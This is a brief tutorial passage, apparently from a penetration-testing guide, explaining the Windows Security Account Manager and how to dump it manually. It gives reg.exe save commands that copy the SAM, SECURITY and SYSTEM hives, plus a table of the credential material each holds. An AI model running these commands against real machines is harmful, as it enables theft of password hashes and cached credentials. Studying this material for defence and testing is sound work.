SAM is short for the Security Account Manager which manages all the user accounts and their passwords. It acts as a database. All the passwords are hashed and then stored in SAM. It is the responsibility of LSA (Local Security Authority) to verify user login by matching the passwords with the database maintained in SAM. SAM starts running in the background as soon as the Windows boots up. These are in hashed format in a registry hive and is mounted on HKLM/SAM and SYSTEM privileges are required to view it because are a sensitive data.
The SAM database is managed by a specific service called SamSs that works alongside lsass.exe:
SAM is found in C:\\Windows\\System32\\config
and passwords that are hashed and saved in SAM can found in the registry, just open the Registry Editor and navigate yourself to HKEY_LOCAL_MACHINE\\SAM.
Dumping SAM database manually
First, get a copy of SAM, SECURITY and SYSTEM registries in order to read them. The lsass.exe executable that handles the SAM database is running during normal Windows operations so the contents of these files cannot be accessed because they are locked by the lsass.exe process:
reg.exe save hklm\\sam c:\\temp\\sam.save
reg.exe save hklm\\security c:\\temp\\security.save
reg.exe save hklm\\system c:\\temp\\system.save
Change the destination path (C:\temp) in case it does not exist or you do not have the necessary permissions.
In Windows environments, passwords are stored in a hashed format in registry hives like SAM (Security Account Manager) and SECURITY.
| Hive | Details | Format or credential material |
|---|---|---|
| SAM | stores locally cached credentials (referred to as SAM secrets) | LM or NT hashes |
| SECURITY | stores domain cached credentials (referred to as LSA secrets) | Plaintext passwords, LM or NT hashes, Kerberos keys (DES, AES), Domain Cached Credentials (DCC1 and DCC2), Security Questions (L$*SQSA*<SID>), |
| SYSTEM | contains enough info to decrypt SAM secrets and LSA secrets | N/A |